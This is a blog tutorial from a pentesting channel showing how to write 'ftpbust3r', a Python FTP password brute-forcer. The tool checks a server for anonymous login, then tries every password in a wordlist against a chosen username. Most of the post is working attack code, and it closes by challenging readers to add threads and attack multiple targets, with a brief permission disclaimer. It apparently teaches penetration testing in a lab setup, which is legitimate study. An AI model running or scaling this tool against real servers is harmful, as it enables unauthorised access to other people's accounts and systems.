Creating an FTP Brute Forcer(ftpbust3r) in python
Python Scripts For Hackers Day 2
In this tutorial, you will learn how to crack FTP servers using a dictionary attack(brute force with a word list) with the help of a ftplib module in Python. A brute-force attack is an attack that submits many passwords to a password-protected file or service with the hope of guessing correctly.
We will be using the ftplib module which comes built-in with Python and colorama (third-part) module to print colors in Python.
Installing Colorama
On Windows
$ pip install coloramaOn Linux
$ pip3 install colorama
Now for demonstration purposes, I have set up an FTP server on my local network on a vulnerable machine that runs on Linux (metasploitable2). If you don't want to use metasploitable2 you can install vsfpd (Very Secure File Transfer Protocol Daemon) which is an FTP server for Unix-like systems. Or if you are using Windows you can install xampp which comes with FileZilla that makes use of FTP.
Related Post How to setup FTP server on Linux
Now you got your FTP server up and running let's quickly jump into the coding part.
from ftplib import FTP # a class to implement the ftp client side
from colorama import Fore, init # for printing fancy colors on terminal
# init the console for colors (Windows)
# init()
# hostname or IP address of the FTP server
host = input("Enter the hostname/ip: ")
# username of the FTP server, root as default for linux
username = input("Enter the username: ")
# the file which contains a list of possible password
passwordlist = input("Enter the filename/path of the wordlist: ")
So let's now analyze what we did here. First, we imported the FTP class of the ftplib module, the Fore, init methods of the colorama module to be used by our FTP cracker and print fancy colors on the terminal respectively. We then ask the user what IP address/hostname of the FTP server he wants to try to crack and we store the data in a variable named host. After that we also ask the user for the username of the FTP server we want to crack and we store it in a variable name username. Finally, we prompt the user for the path or filename of their password list and place it in a variable named passwordlist.
Now let's write the function that checks if our server allows anonymous login and takes our ftp host/IP as a parameter and returns either True or False. If you don't know what anonymous login is, Anonymous login is
# a function that checks for anonymous login on the target server ftp server
def check_anon_login(host):
try:
with FTP(host) as ftp:
# trying anonymous credentials
ftp.login() # user anonymous, passwd anonymous@
# return true if the server allows anonymous login
return True
except:
# otherwise return false
return False
In the above code, we defined a function name check_anon_login which takes an ftp host as a parameter. We then begin a try/except block. This block will attempt to run some code and if it fails or the code has an error it will fall out and go to the except clause below. Inside the try block, we used a context manager to initialize the FTP server object, pass the host parameter as an argument(FTP(host)), aliased it to FTP and then we try to log in using anonymous credentials to that host. This will raise an exception if the server doesn't accept anonymous login, so if it's raised, we'll just return False, and True otherwise.
Now let's write the core function that accepts a FTP host,FTP username and password list in arguments and returns whether the credentials are correct or wrong:
def ftp_buster(host, username, passwordlist):
# open the passwordlist file and read the passwords
with open(passwordlist, "r") as passwd_file:
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwd_file.readlines():
password = password.strip()
with FTP(host=host,timeout=0.1) as ftp:
try:
ftp.login(user=username, passwd=password)
print(f"{Fore.GREEN}Password Found: {password}",Fore.RESET)
break
except Exception as e:
print(f"Trying...:{password}")
continue
Let's analyze what we did on the above code. We first defined a function name ftp_buster which of course takes the host, username and path/filename of the wordlist, used a context manager to open the passwordlist file in read mode and alias to passwd_file. We begin a for loop that will iterate through each password and remove any leading and trailing spaces using the strip function. And finally, we begin a try/except clause to try each password for the username the user input above.
If the username and password create a successful connection, we print the "Password Found" statement together with the password and then break out of the loop and the connection is closed. If it fails, it falls out to the except clause below and continue to try other passwords.
Now it's time to call our functions
# check if our ftp server accepts anonymous login, if not we try to brute force the password using the ftp_buster function
if check_anon_login(host=host):
print("logged In")
else:
print("Anonymous login failed, Trying to brute force the password")
ftp_buster(host=host, username=username, passwordlist=passwordlist)
In the above code, we first check if our FTP server accepts anonymous login, if not we try to brute force the password using the ftp_buster function.
Pretty cool, we're done! Congrats if you have reached this far Here is the complete GitHub code for the toolftpbust3r
Now here is your task/challenge
improve the script so can it brute force multiple targets
improve the script to accept command line arguments
use threads to speed up the brute force process
that's basically it. Feel free to share your scripts with me on twitter xtreme pentesting
If you have an query or question feel free to dm me xtremepentest.
Suggestions are welcome, feel free to give me your suggestions and opinions in the on our telegram group xtreme pentesting or in the comment section below.
DISCLAIMER: Use this attack on a machine that you have permission to test, otherwise we are not responsible for any harm you do to anyone.
Happy Hacking